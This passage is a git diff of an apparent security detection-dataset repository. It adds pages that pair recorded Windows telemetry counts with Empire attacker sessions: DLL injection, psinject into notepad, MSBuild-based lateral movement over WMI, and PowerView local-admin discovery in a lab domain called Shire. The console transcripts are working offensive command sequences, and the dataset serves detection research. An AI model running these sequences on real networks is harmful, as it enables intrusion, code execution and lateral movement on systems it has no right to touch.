NT AUTHORITY\LOCAL + SERVICE + +(Empire: TKV35P8X) > upload /tmp/launcher.dll +[*] Tasked agent to upload launcher.dll, 155 KB +[*] Tasked TKV35P8X to run TASK_UPLOAD +[*] Agent TKV35P8X tasked with task ID 30 +(Empire: TKV35P8X) > usemodule code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 3124 +(Empire: powershell/code_execution/invoke_dllinjection) > execute +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task 
ID 31 +[*] Tasked agent TKV35P8X to run module powershell/code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > System.Diagnostics.ProcessModule (launcher.dll) +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz new file mode 100644 index 00000000..1f5afb6e Binary files /dev/null and b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md new file mode 100644 index 00000000..26346119 --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md 
@@ -0,0 +1,130 @@ +# Empire Psinject + +Adversaries can reflectively load a DLL to enable additional functionalities to any process in the endpoint. An adversary can use Empire psinject to inject Unmanaged PowerShell into any process. This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. + +## Technique(s) ID + +T1055 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_psinject.tar.gz](./empire_psinject.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18200432 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1739 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 16 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 474 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 167 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 127 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 50 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 15 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 13 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 9 | +| Security | 
Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 9 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | +| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1442 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 538 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 408 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 257 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 88 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 67 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 44 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 38 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 11 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 10 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing 
Pipeline | 1711 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule management/psinject +(Empire: powershell/management/psinject) > set ProcName notepad +(Empire: powershell/management/psinject) > info + + Name: Invoke-PSInject + Module: powershell/management/psinject + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + @sixdub + leechristensen (@tifkin_) + +Description: + Utilizes Powershell to to inject a Stephen Fewer formed + ReflectivePick which executes PS codefrom memory in a remote + process + +Comments: + http://sixdub.net + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ProcId False ProcessID to inject into. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Agent True TKV35P8X Agent to run module on. + Listener True https Listener to use. + ProcName False notepad Process name to inject into. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). 
+ +(Empire: powershell/management/psinject) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 13 +[*] Tasked agent TKV35P8X to run module powershell/management/psinject +(Empire: powershell/management/psinject) > Job started: BELAKR +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent EMDBFPSY checked in +[+] Initial agent EMDBFPSY from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to EMDBFPSY at 10.0.10.103 + +(Empire: powershell/management/psinject) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 20:06:25 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 20:06:28 https + 56W8UEHP ps 172.18.39.106 HR001 SHIRE\nmartha cmd 8572 5/0.0 2019-05-18 20:03:49 https + + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 20:06:28 https +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz new file mode 100644 index 00000000..fd223689 Binary files /dev/null and b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md deleted file mode 100644 index 21b6deb2..00000000 --- a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md +++ /dev/null 
@@ -1,9 +0,0 @@ -# Reflective DLL Load - -Adversaries can reflectively load a DLL to enable additional functionalities to any process in the endpoint. - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_psinject](./empire_psinject.md) | 2019-03-19151711 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md deleted file mode 100644 index 029e63b3..00000000 --- a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md +++ /dev/null 
@@ -1,92 +0,0 @@ - -# Empire Psinject - -An adversary can use Empire psinject to inject Unmanaged PowerShell into any process. This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. - -## Technique(s) ID - -T1055 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_psinject.tar.gz](./empire_psinject.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19151711 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 2166 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 16 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 240 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 179 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 149 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 6 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | -| Microsoft-Windows-Sysmon/Operational | 
Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 293 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 225 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 217 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 88 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 88 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 28 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 23 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 17 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2115 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | - -## Empire Activity - -``` -psinject https 8148 -``` - -``` -[*] Tasked G6BYHU4F to run TASK_CMD_JOB -[*] Agent G6BYHU4F tasked with task ID 6 -[*] Tasked agent G6BYHU4F to run module powershell/management/psinject -(Empire: G6BYHU4F) > Job 
started: 2AZBLF -[*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent MPB3UHD1 checked in -[+] Initial agent MPB3UHD1 from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to MPB3UHD1 at 10.0.10.104 - -(Empire: G6BYHU4F) > -(Empire: G6BYHU4F) > -(Empire: G6BYHU4F) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 2MES3XN6 ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 4312 5/0.0 2019-03-19 14:11:49 https - G6BYHU4F ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 9156 5/0.0 2019-03-19 14:11:50 https - MPB3UHD1 ps 172.18.39.105 IT001 *SHIRE\pgustavo cmd 8148 5/0.0 2019-03-19 14:11:47 https - - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz deleted file mode 100644 index 2dc65cca..00000000 Binary files a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz and /dev/null differ diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md new file mode 100644 index 00000000..c427b18c --- /dev/null +++ b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md 
@@ -0,0 +1,9 @@ +# Trusted Developer Utilities + +There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_msbuild](./empire_invoke_msbuild.md) | 2019-05-18213907 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md new file mode 100644 index 00000000..d4a1737a --- /dev/null +++ b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md 
@@ -0,0 +1,173 @@ +# Empire Invoke Msbuild + +MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. + +Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. + +## Technique(s) ID + +T1127 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_msbuild.tar.gz](./empire_invoke_msbuild.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18213907 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 796 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-Kernel-General | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 437 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 180 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 157 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 63 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 25 | +| Security | 
Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 17 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 17 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 17 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 11 | +| Security | Microsoft-Windows-Security-Auditing | Other Policy Change Events | 8 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 6 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 4 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 2667 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1217 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 783 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 416 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 288 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 179 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 45 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe 
Connected (rule: PipeEvent) | 37 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 660 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_executemsbuild +(Empire: powershell/lateral_movement/invoke_executemsbuild) > info + + Name: Invoke-ExecuteMSBuild + Module: powershell/lateral_movement/invoke_executemsbuild + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @xorrior + +Description: + This module utilizes WMI and MSBuild to compile and execute + an xml file containing an Empire launcher + +Comments: + Inspired by @subtee http://subt0x10.blogspot.com/2016/09 + /bypassing-application-whitelisting.html + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + UserName False UserName if executing with credentials + CredID False CredID from the store to use. + ComputerName True Host to target + DriveLetter False Drive letter to use when mounting the + share locally + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). 
+ FilePath False Desired location to copy the xml file on + the target + Agent True V6W3TH8Y Agent to grab a screenshot from. + Listener True Listener to use. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password if executing with credentials + +(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener https +(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 5 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_executemsbuild +(Empire: powershell/lateral_movement/invoke_executemsbuild) > + +__GENUS : 2 +__CLASS : __PARAMETERS +__SUPERCLASS : +__DYNASTY : __PARAMETERS +__RELPATH : +__PROPERTY_COUNT : 2 +__DERIVATION : {} +__SERVER : +__NAMESPACE : +__PATH : +ProcessId : 6732 +ReturnValue : 0 +PSComputerName : + + + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent 38APWSR1 checked in +[+] Initial agent 38APWSR1 from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to 38APWSR1 at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:39:49 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:39:49 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:39:47 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 
2019-05-18 21:39:50 https + 38APWSR1 ps 172.18.39.105 IT001 *SHIRE\pgustavo MSBuild 5656 5/0.0 2019-05-18 21:39:49 https + +(Empire: agents) > +(Empire: agents) > interact 38APWSR1 +(Empire: 38APWSR1) > shell whoami +[*] Tasked 38APWSR1 to run TASK_SHELL +[*] Agent 38APWSR1 tasked with task ID 1 +(Empire: 38APWSR1) > shire\pgustavo +..Command execution completed. + +(Empire: 38APWSR1) > +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz new file mode 100644 index 00000000..bc800bbc Binary files /dev/null and b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/README.md b/small_datasets/windows/discovery/account_discovery_T1087/README.md new file mode 100644 index 00000000..6d430350 --- /dev/null +++ b/small_datasets/windows/discovery/account_discovery_T1087/README.md @@ -0,0 +1,11 @@ +# Account Discovery + +Adversaries may attempt to get a listing of local system or domain accounts. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_user](./empire_net_user.md) | 2019-03-19020729 | +| shire | [empire_net_user_domain](./empire_net_user_domain.md) | 2019-03-19021158 | +| shire | [empire_net_user_domain_specific](./empire_net_user_domain_specific) | 2019-05-18230446 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md b/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md deleted file mode 100644 index f5fc9d87..00000000 --- a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md +++ /dev/null 
@@ -1,9 +0,0 @@ -# Domain Users - -An adversary can enumerate all domain users - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_user_domain](./empire_net_user_domain.md) | 2019-03-19021158 | diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md new file mode 100644 index 00000000..a83bd106 --- /dev/null +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md 
@@ -0,0 +1,136 @@ +# Empire Find Local Admin Access + +Finds machines on the local domain where the current user has local administrator access. It uses the OpenSCManagerW Win32API call to establish +a handle to the remote host. If this succeeds, the current user context has local administrator acess to the target. + +## Technique(s) ID + +T1087 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_find_local_admin.tar.gz](./empire_find_local_admin.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18224039 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1100 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 40 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 9 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 246 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 173 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 130 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 52 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 44 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| 
Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 290 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 214 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 146 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 145 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 48 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 39 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 986 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule situational_awareness/network/powerview/find_localadmin_access +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > info + + Name: Find-LocalAdminAccess + Module: 
powershell/situational_awareness/network/powerview/find_localadmin_access + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Finds machines on the local domain where the current user + has local administrator access. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False Hosts to enumerate, comma separated. + SearchScope False Specifies the scope to search under, + Base/OneLevel/Subtree (default of + Subtree) + ComputerSiteName False Search computers in the specific AD site + name, wildcards accepted. + Server False Specifies an active directory server + (domain controller) to bind to + Tombstone False Switch. Specifies that the search should + also return deleted/tombstoned objects. + ComputerOperatingSystem False Searches computers with a specific + operating system. Wildcards accepted. + ResultPageSize False Specifies the PageSize to set for the + LDAP searcher object. + ComputerDomain False Specifies the domain to query for + computers, defaults to the current + domain. + ComputerSearchBase False Specifies the LDAP source to search + through for computers + ServerTimeLimit False Specifies the maximum amount of time the + server spends searching. Default of 120 + seconds. + ComputerServicePack False Search computers with a specific service + pack + Agent True V6W3TH8Y Agent to run module on. + CheckShareAccess False Switch. Only display found shares that + the local user has access to. + ComputerLDAPFilter False Specifies an LDAP query string that is + used to search for computer objects. 
